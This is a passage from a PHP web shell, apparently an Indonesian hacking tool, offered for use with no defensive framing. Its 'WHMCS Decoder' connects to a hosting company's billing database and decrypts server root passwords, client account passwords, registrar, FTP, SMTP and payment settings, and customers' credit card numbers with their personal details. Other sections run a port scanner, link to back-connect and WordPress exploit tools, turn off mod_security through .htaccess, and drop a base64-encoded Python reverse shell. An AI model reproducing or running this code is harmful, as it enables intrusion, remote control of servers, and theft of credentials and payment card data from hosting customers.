1419. echo"<p><br/><body>
1420. <center><br/><br/><nobr><b><span>WHMCS DECODER</span></b></nobr><br/><br/>
1421. <p><form method='post'>
1422. <table border=1>
1423. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu1' value='localhost'></td></tr>
1424. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu2'></td></tr>
1425. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu3'></td></tr>
1426. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu4'></td></tr>
1427. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:transparent' type='text' size='60' name='anu5'></td></tr>
1428. <tr><td align='center' colspan='2'><input class=submit type='submit' style='color:#FF0000;background-color:transparent' value=' HAJAR ' name='plapon'></td></tr>
1429.  
1430. </table>
1431. <br></form></center>";
1432.  
1433.  
1434. $perawan = $_POST['anu1'];
1435. $kimcil = $_POST['anu2'];
1436. $janda = $_POST['anu3'];
1437. $hotel = $_POST['anu4'];
1438. $kondom = $_POST['anu5'];
1439. @mysql_connect($perawan, $kimcil, $janda);
1440. @mysql_select_db($hotel);
1441. $cc_encryption_hash = $kondom;
1442. function dec($string, $cc_encryption_hash) {
1443. $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
1444. $hash_key = _hash($key);
1445. $hash_length = strlen($hash_key);
1446. $string = base64_decode($string);
1447. $tmp_iv = substr($string, 0, $hash_length);
1448. $string = substr($string, $hash_length, strlen($string) - $hash_length);
1449. $iv = $out = '';
1450. $c = 0;
1451. while ($c < $hash_length) {
1452. $iv.= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
1453. ++$c;
1454. }
1455. $key = $iv;
1456. $c = 0;
1457. while ($c < strlen($string)) {
1458. if (($c != 0 AND $c % $hash_length == 0)) {
1459. $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
1460. }
1461. $out.= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
1462. ++$c;
1463. }
1464. return $out;
1465. }
1466. function _hash($string) {
1467. $hash = (function_exists('sha1')) ? sha1($string) : md5($string);
1468. $out = '';
1469. $c = 0;
1470. while ($c < strlen($hash)) {
1471. $out.= chr(hexdec($hash[$c] . $hash[$c + 1]));
1472. $c+= 2;
1473. }
1474. return $out;
1475. }
1476. ######## GO TO HELL ########
1477. ##### :D ########### :D #####
1478. if (isset($_POST['plapon'])) {
1479. $query = mysql_query("SELECT *FROM tblservers");
1480. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1481. <tr><th colspan='7'> <span> HOST ROOT </span> </th></tr>
1482. <tr>
1483. <th class='th_home' align='center'><b>TYPE</b></th>
1484. <th class='th_home' align='center'><b>ACTIVE</b></th>
1485. <th class='th_home' align='center'><b>HOSTNAME</b></th>
1486. <th class='th_home' align='center'><b>IP ADDRESS</b></th>
1487. <th class='th_home' align='center'><b>USERNAME</b></th>
1488. <th class='th_home' align='center'><b>PASSWORD</b></th>
1489. <th class='th_home' align='center'><b>ACCESS HASH</b></th></tr>";
1490. if (!is_array(mysql_fetch_array($query))) {
1491. echo "<tr><td colspan='8' align='center'>Nothing Found !</td></tr>";
1492. }
1493. while ($v = mysql_fetch_array($query)) {
1494. echo "<tr>
1495. <td class='td_home' align='center'>{$v['type']}</td>
1496. <td class='td_home' align='center'>{$v['active']}</td>
1497. <td class='td_home' align='center'>{$v['hostname']}</td>
1498. <td class='td_home' align='center'>{$v['ipaddress']}</td>
1499. <td class='td_home' align='center'>{$v['username']}</td>
1500. <td class='td_home' align='center'>" . dec($v['password'], $cc_encryption_hash) . "</td>
1501. <td class='td_home' align='center'>{$v['accesshash']}</td>
1502. </tr>";
1503. }
1504. echo "</table>";
1505. $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'vmuserxx' or username = 'vmuser' or username = 'admin' or username = 'Admin' or username = 'administrator' or username = 'Administrator' order by domainstatus");
1506. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1507. <tr><th colspan='6'><span>CLIENTS ROOT</span> </th></tr>
1508.  
1509. <tr>
1510. <th class='th_home' align='center'><b> DOMAIN</b></th>
1511. <th class='th_home' align='center'><b> STATUS</b></th>
1512. <th class='th_home' align='center'><b> USERNAME</b></th>
1513. <th class='th_home' align='center'><b> PASSWORD</b></th>
1514. <th class='th_home' align='center'><b> DEDICATED IP</b></th>
1515. <th class='th_home' align='center'><b> ASSIGNED IP</b></th></tr>";
1516. if (!is_array(mysql_fetch_array($query))) {
1517. echo "<tr><td colspan='6' align='center'>Nothing Found ! :(</td></tr>";
1518. }
1519. while ($v = mysql_fetch_array($query)) {
1520. echo "<tr>
1521. <td class='td_home' align='center'> {$v['domain']}</td>
1522. <td class='td_home' align='center'> {$v['domainstatus']}</td>
1523. <td class='td_home' align='center'> {$v['username']}</td>
1524. <td class='td_home' align='center'> " . dec($v['password'], $cc_encryption_hash) . "</td>
1525. <td class='td_home' align='center'> {$v['dedicatedip']}</td>
1526. <td class='td_home' align='center'> {$v['assignedips']}</td></tr>";
1527. }
1528. echo "</table>";
1529. $query = mysql_query("SELECT *FROM tblregistrars");
1530. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1531. <tr><th colspan='3'><nobr><span> DOMAIN REGISTRAR </span></nobr></th></tr>
1532. <tr>
1533. <th class='th_home' align='center'><b>REGISTRAR</b></th>
1534. <th class='th_home' align='center'><b>SETTING</b></th>
1535. <th class='th_home' align='center'><b>VALUE</b></th></tr>";
1536. if (!is_array(mysql_fetch_array($query))) {
1537. echo "<tr><td colspan='3' align='center'>Nothing Found !</td></tr>";
1538. }
1539. while ($v = mysql_fetch_array($query)) {
1540. $value = (!dec($v['value'], $cc_encryption_hash)) ? "0" : dec($v['value'], $cc_encryption_hash);
1541. echo "<tr>
1542. <td class='td_home' align='center'>{$v['registrar']}</td>
1543. <td class='td_home' align='center'>{$v['setting']}</td>
1544. <td class='td_home' align='center'>$value</td></tr>";
1545. }
1546. echo "</table>";
1547. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
1548. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1549. <tr><th colspan='4'> <span> FTP BACKUP </span> </th></tr>
1550.  
1551. <tr>
1552. <th class='th_home' align='center'><b>FTP HOSTNAME</b></th>
1553. <th class='th_home' align='center'><b>FTP USERNAME</b></th>
1554. <th class='th_home' align='center'><b>FTP PASSWORD</b></th>
1555. <th class='th_home' align='center'><b>DESTINATION</b></th></tr>";
1556. $ftpb = array('FTPBackupHostname', 'FTPBackupUsername', 'FTPBackupPassword', 'FTPBackupDestination');
1557. if (!is_array(mysql_fetch_array($query))) {
1558. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
1559. }
1560. while ($row = mysql_fetch_array($query)) {
1561. if ($row[setting] == $ftpb[0]) {
1562. echo "<tr><td class='td_home'>{$row[value]}</td>";
1563. $ftpb[0] = xxx;
1564. } elseif ($row[setting] == $ftpb[1]) {
1565. echo "<td class='td_home'>{$row[value]}</td>";
1566. $ftpb[1] = xxx;
1567. } elseif ($row[setting] == $ftpb[2]) {
1568. echo "<td class='td_home'>{$row[value]}</td>";
1569. $ftpb[2] = xxx;
1570. } elseif ($row[setting] == $ftpb[3]) {
1571. echo "<td class='td_home'>{$row[value]}</td>";
1572. $ftpb[3] = xxx;
1573. }
1574. }
1575. echo "</table>";
1576. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
1577. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1578. <tr><th colspan='4'><span> SMTP SERVER </span> </th></tr>
1579. <tr>
1580. <th class='th_home' align='center'><b>SMTP HOST</b></th>
1581. <th class='th_home' align='center'><b>SMTP USER</b></th>
1582. <th class='th_home' align='center'><b>SMTP PASS</b></th>
1583. <th class='th_home' align='center'><b>SMTP PORT</b></th></tr>";
1584. $smtp = array('SMTPHost', 'SMTPUsername', 'SMTPPassword', 'SMTPPort');
1585. if (!is_array(mysql_fetch_array($query))) {
1586. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
1587. }
1588. while ($row = mysql_fetch_array($query)) {
1589. if ($row[setting] == $smtp[0]) {
1590. echo "<tr><td class='td_home'>{$row[value]}</td>";
1591. $smtp[0] = xxx;
1592. } elseif ($row[setting] == $smtp[1]) {
1593. echo "<td class='td_home'>{$row[value]}</td>";
1594. $smtp[1] = xxx;
1595. } elseif ($row[setting] == $smtp[2]) {
1596. echo "<td class='td_home'>{$row[value]}</td>";
1597. $smtp[2] = xxx;
1598. } elseif ($row[setting] == $smtp[3]) {
1599. echo "<td class='td_home'>{$row[value]}</td>";
1600. $smtp[3] = xxx;
1601. }
1602. }
1603. echo "</table>";
1604. $query = mysql_query("SELECT *FROM tblpaymentgateways");
1605. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1606. <tr><th colspan='4'><nobr><span> PAYMENTS GATEWAY </span></nobr></th></tr>
1607.  
1608. <tr>
1609. <th class='th_home' align='center'><b>GATEWAY</b></th>
1610. <th class='th_home' align='center'><b>SETTING</b></th>
1611. <th class='th_home' align='center'><b>VALUE</b></th>
1612. <th class='th_home' align='center'><b>ORDER</b></th></tr>";
1613. if (!is_array(mysql_fetch_array($query))) {
1614. echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
1615. }
1616. while ($v = mysql_fetch_array($query)) {
1617. echo "<tr>
1618. <td class='td_home' align='center'>{$v['gateway']}</td>
1619. <td class='td_home' align='center'>{$v['setting']}</td>
1620. <td class='td_home' align='center'>{$v['value']}</td>
1621. <td class='td_home' align='center'>{$v['order']}</td> </tr>";
1622. }
1623. echo "</table>";
1624. $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
1625. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1626. <tr><th colspan='10'><nobr><span> CLIENTS CREDIT CARD </span></nobr></th></tr>
1627. <tr>
1628. <th class='th_home' align='center'><b>CardType</b></th>
1629. <th class='th_home' align='center'><b>CardNumb</b></th>
1630. <th class='th_home' align='center'><b>Expdate</b></th>
1631. <th class='th_home' align='center'><b>IssueNumber</b></th>
1632. <th class='th_home' align='center'><b>FirstName</b></th>
1633. <th class='th_home' align='center'><b>LastName</b></th>
1634. <th class='th_home' align='center'><b>Address</b></th>
1635. <th class='th_home' align='center'><b>Country</b></th>
1636. <th class='th_home' align='center'><b>Phone</b></th>
1637. <th class='th_home' align='center'><b>Email</b></th>
1638. </tr>";
1639. if (!is_array(mysql_fetch_array($query))) {
1640. echo "<tr><td colspan='10' align='center'>Nothing Found ! :(</td></tr>";
1641. }
1642. while ($v = mysql_fetch_array($query)) {
1643. $cchash = md5($cc_encryption_hash . $v['0']);
1644. $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='" . $v['0'] . "'");
1645. $v2 = mysql_fetch_array($s);
1646. echo "<tr>
1647. <td class='td_home' align='center'>" . $v2['cardtype'] . "</td>
1648. <td class='td_home' align='center'>" . $v2['cardnum'] . "</td>
1649. <td class='td_home' align='center'>" . $v2['expdate'] . "</td>
1650. <td class='td_home' align='center'>" . $v2['issuenumber'] . "</td>
1651. <td class='td_home' align='center'>" . $v2['firstname'] . "</td>
1652. <td class='td_home' align='center'>" . $v2['lastname'] . "</td>
1653. <td class='td_home' align='center'>" . $v2['address1'] . "</td>
1654. <td class='td_home' align='center'>" . $v2['country'] . "</td>
1655. <td class='td_home' align='center'>" . $v2['phonenumber'] . "</td>
1656. <td class='td_home' align='center'>" . $v2['email'] . "</td></tr>";
1657. }
1658. echo "</table>";
1659. $query = mysql_query("SELECT *FROM tblhosting");
1660. echo "<br/><br/><center>
1661. <table class='table_home' style=width:830px;padding:0 1px;>
1662. <tr><th colspan='6'><nobr><span> CLIENTS HOSTING ACCOUNT </span></nobr></th></tr>
1663. <tr>
1664. <th class='th_home' align='center'><b>DOMAIN</b></th>
1665. <th class='th_home' align='center'><b>STATUS</b></th>
1666. <th class='th_home' align='center'><b>USERNAME</b></th>
1667. <th class='th_home' align='center'><b>PASSWORD</b></th>
1668. <th class='th_home' align='center'><b>DEDICATED IP</b></th>
1669. <th class='th_home' align='center'><b>ASSIGNED IP</b></th></tr>";
1670. if (!is_array(mysql_fetch_array($query))) {
1671. echo "<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
1672. }
1673. while ($v = mysql_fetch_array($query)) {
1674. echo "<tr>
1675. <td class='td_home' align='center'>{$v['domain']}</td>
1676. <td class='td_home' align='center'>{$v['domainstatus']}</td>
1677. <td class='td_home' align='center'>{$v['username']}</td>
1678. <td class='td_home' align='center'>" . dec($v['password'], $cc_encryption_hash) . "</td>
1679. <td class='td_home' align='center'>{$v['dedicatedip']}</td>
1680. <td class='td_home' align='center'>{$v['assignedips']}</td></tr>";
1681. }
1682. echo "</table>";
1683. }
1684. }
1685. elseif($_GET['do'] == 'hash') {
1686. echo "<center>";
1687. echo "<ul>";
1688. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1689. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1690. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1691. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1692. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1693. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1694. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1695. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1696. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1697. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1698. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1699. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1700. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1701. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1702. echo "</ul>";
1703. echo "</center>";
1704. if (isset($_POST['gethash'])) {
1705. $hash = $_POST['hash'];
1706. if (strlen($hash) == 32) {
1707. $hashresult = "MD5 Hash";
1708. } elseif (strlen($hash) == 40) {
1709. $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
1710. } elseif (strlen($hash) == 13) {
1711. $hashresult = "DES(Unix) Hash";
1712. } elseif (strlen($hash) == 16) {
1713. $hashresult = "MySQL Hash / /DES(Oracle Hash)";
1714. } elseif (strlen($hash) == 41) {
1715. $GetHashChar = substr($hash, 40);
1716. if ($GetHashChar == "*") {
1717. $hashresult = "MySQL5 Hash";
1718. }
1719. } elseif (strlen($hash) == 64) {
1720. $hashresult = "SHA-256 Hash";
1721. } elseif (strlen($hash) == 96) {
1722. $hashresult = "SHA-384 Hash";
1723. } elseif (strlen($hash) == 128) {
1724. $hashresult = "SHA-512 Hash";
1725. } elseif (strlen($hash) == 34) {
1726. if (strstr($hash, '$1$')) {
1727. $hashresult = "MD5(Unix) Hash";
1728. }
1729. } elseif (strlen($hash) == 37) {
1730. if (strstr($hash, '$apr1$')) {
1731. $hashresult = "MD5(APR) Hash";
1732. }
1733. } elseif (strlen($hash) == 34) {
1734. if (strstr($hash, '$H$')) {
1735. $hashresult = "MD5(phpBB3) Hash";
1736. }
1737. } elseif (strlen($hash) == 34) {
1738. if (strstr($hash, '$P$')) {
1739. $hashresult = "MD5(Wordpress) Hash";
1740. }
1741. } elseif (strlen($hash) == 39) {
1742. if (strstr($hash, '$5$')) {
1743. $hashresult = "SHA-256(Unix) Hash";
1744. }
1745. } elseif (strlen($hash) == 39) {
1746. if (strstr($hash, '$6$')) {
1747. $hashresult = "SHA-512(Unix) Hash";
1748. }
1749. } elseif (strlen($hash) == 24) {
1750. if (strstr($hash, '==')) {
1751. $hashresult = "MD5(Base-64) Hash";
1752. }
1753. } else {
1754. $hashresult = "Hash type not found";
1755. }
1756. } else {
1757. $hashresult = "<center>Not Hash Entered</center>";
1758. }
1759.  
1760. echo"<center>
1761.  
1762. <form action='' method='POST'>
1763. <tr>
1764. <th colspan='5'>Hash Identification</th><br><br>
1765. <tr class='optionstr'><B><td>Enter Hash :</td><br></b><td></td> <td><input type='text' name='hash' size='60' class='inputz' /></td><td><input type='submit' class='inputzbut' name='gethash' value='Identify Hash' /></td></tr><br>
1766. <tr class='optionstr'><b><td>Result</td><td>:</td><td></td></tr></b>
1767. </tr></form>
1768. </center>";
1769. echo "<center>$hashresult</center>";
1770.  
1771. }
1772. elseif($_GET['do'] == 'portsc') {
1773. echo "<center>";
1774. echo "<ul>";
1775. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1776. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1777. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1778. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1779. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1780. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1781. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1782. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1783. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1784. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1785. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1786. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1787. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1788. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1789. echo "</ul>";
1790. echo "</center>";
1791. echo"<form action='' method='post'>" ;
1792. $start = strip_tags($_POST['start']);
1793. $end = strip_tags($_POST['end']);
1794. $host = strip_tags($_POST['host']);
1795. if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) {
1796. for ($i = $start;$i <= $end;$i++) {
1797. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
1798. if ($fp) {
1799. echo 'Port ' . $i . ' is <font color=green>open</font><br>';
1800. }
1801. flush();
1802. }
1803. } else {
1804. echo '<center><table class=tabnet style="width:300px;padding:0 1px;">
1805. <input type="hidden" name="y" value="phptools">
1806. <tr><th colspan="5">Port Scanner</th></center></tr>
1807. <tr>
1808. <td>Host</td>
1809. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>
1810. </tr>
1811. <tr>
1812. <td>Port start</td>
1813. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>
1814. </tr>
1815. <tr><td>Port end</td>
1816. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="end" value="5000"/></td>
1817. </tr><td><center><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />
1818. </td></form></center></table>';
1819. }
1820.  
1821. }
1822. elseif($_GET['do'] == 'ptbc') {
1823. echo "<center>";
1824. echo "<ul>";
1825. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1826. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1827. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1828. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1829. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1830. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1831. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1832. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1833. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
1834. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1835. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1836. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1837. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1838. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1839. echo "</ul>";
1840. echo "</center>";
1841. mkdir('pyrevrshell', 0755);
1842. chdir('pyrevrshell');
1843. $seropil = ".htaccess";
1844. $angelinalll = "$seropil";
1845. $shitttyz = fopen ($angelinalll , 'w') or die ("shitttyz a&#231;&#305;lamad&#305;!");
1846. $dffvfdgfg = "<IfModule mod_security.c>
1847. SecFilterEngine Off
1848. SecFilterScanPOST Off
1849. </IfModule>";
1850. fwrite ( $shitttyz , $dffvfdgfg ) ;
1851. fclose ($shitttyz);
1852. //extract python reverse script
1853. $vkffhd = 'IyEvdXNyL2Jpbi9weXRob24NCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHNvY2tldA0KaW1wb3J0IHB0eQ0KIA0Kc2hlbGwgPSAiL2Jpbi9zaCINCiANCmRlZiB1c2FnZShwcm9ncmFtbmFtZSk6DQpwcmludCAieXRob24gY29ubmVjdC1iYWNrIGRvb3IiDQpwcmludCAiVXNhZ2U6ICVzIDxjb25uX2JhY2tfaXA+IDxwb3J0PiIgJSBwcm9ncmFtbmFtZQ0KIA0KZGVmIG1haW4oKToNCmlmIGxlbihzeXMuYXJndikgIT0zOg0KdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQpzeXMuZXhpdCgxKQ0KIA0KcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KIA0KdHJ5Og0Kcy5jb25uZWN0KChzb2NrZXQuZ2V0aG9zdGJ5bmFtZShzeXMuYXJndlsxXSksaW50KHN5cy5hcmd2WzJdKSkpDQpwcmludCAiWytdQ29ubmVjdCBPSy4iDQpleGNlcHQ6DQpwcmludCAiWy1dQ2FuJ3QgY29ubmVjdCINCnN5cy5leGl0KDIpDQogDQpvcy5kdXAyKHMuZmlsZW5vKCksMCkNCm9zLmR1cDIocy5maWxlbm8oKSwxKQ0Kb3MuZHVwMihzLmZpbGVubygpLDIpDQpnbG9iYWwgc2hlbGwNCm9zLnVuc2V0ZW52KCJISVNURklMRSIpDQpvcy51bnNldGVudigiSElTVEZJTEVTSVpFIikNCnB0eS5zcGF3bihzaGVsbCkNCnMuY2xvc2UoKQ0KIA0KaWYgX19uYW1lX18gPT0gIl9fbWFpbl9fIjoNCm1haW4oKQ==';
1854.  
1855. $jkol = fopen("reversesh.py" ,"w+");
1856. $write = fwrite ($jkol ,base64_decode($vkffhd));
1857. fclose($jkol);
1858. chmod("reversesh.py",0755);
1859.  
1860. //extract php command shell
1861. $merdeeeee = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQeXRob24gQ29ubmVjdCBTaGVsbCBQcml2ODwvdGl0bGU+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3MTQuMHp6MC5jb20vMjAxNC8wNi8wNC8yMS8zOTY1NTQzOTQucG5nIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHl7IGJhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50ICFpbXBvcnRhbnQ7IGNvbG9yOiAjMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4O30gICAgICBhe3RleHQtZGVjb3JhdGlvbjpub25lOyBmb250LWZhbWlseTogVGFob21hLCBHZW5ldmE7IGNvbG9yOiMwMDc3MDA7IHBhZGRpbmc6MnB4IDJweDt9ICAgICAgYTpob3Zlcntjb2xvcjojMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDBmZjAwIDBweCAwcHggM3B4O30JICAuYXJlYSB7IGNvbG9yOiAjMDBiYjAwOyBmb250LXNpemU6IDlwdDsgdGV4dC1zaGFkb3c6IzAwMDAwMCAwcHggMnB4IDdweDsgYm9yZGVyOiBzb2xpZCAwcHggIzAwNzcwMDsgYmFja2dyb3VuZC1jb2xvcjp0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwOTkwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgfQkgIGlucHV0W3R5cGU9c3VibWl0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwNzcwOyAgZm9udC13ZWlnaHQ6IGJvbGQ7IHRleHQtYWxpZ246IGNlbnRlcjsgIHRleHQtc2hhZG93OiAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuMyk7ICBiYWNrZ3JvdW5kOiAjYWVhZWFlOyAgYmFja2dyb3VuZC1jbGlwOiBwYWRkaW5nLWJveDsgIGJvcmRlcjogMXB4IHNvbGlkICMyODQ0NzM7ICBib3JkZXItYm90dG9tLWNvbG9yOiAjMjIzYjY2OyAgYm9yZGVyLXJhZGl1czogNHB4OyAgY3Vyc29yOiBwb2ludGVyOyAgYmFja2dyb3VuZC1pbWFnZTotd2Via2l0LWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogLW1vei1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1vLWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogbGluZWFyLWdyYWRpZW50KHRvIGJvdHRvbSwgI2VhZWFlYSwgI2QwZDBkMCk7ICAtd2Via2l0LWJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyAgYm94LXNoYWRvdzogaW5zZXQgMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjUpLCBpbnNldCAwIDAgN3B4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC40KSwgMCAxcHggMXB4IHJnYmEoMCwgMCwgMCwgMC4xNSk7IH0gaW5wdXRbdHlwZT10ZXh0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6ICM3Nzc3NzcgMHB4IDBweCAzcHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA3NzAwOyAgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LDg1LDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7fSBpbnB1dFt0eXBlPXN1Ym1pdF06aG92ZXIsIGlucHV0W3R5cGU9dGV4dF06aG92ZXJ7IGNvbG9yOiAjZmZmZmZmOyB0ZXh0LXNoYWRvdzogIzAwNjYwMCAwcHggMHB4IDRweDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4O30gc2VsZWN0eyBwYWRkaW5nOiAzcHg7IHdpZHRoOiAxNjJweDsgY29sb3I6ICMwMGFhMDA7IHRleHQtc2hhZG93OiMwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyB0ZXh0LWRlY29yYXRpb246IG5vbmU7IGJveC1zaGFkb3c6IDBweCAwcHggNHB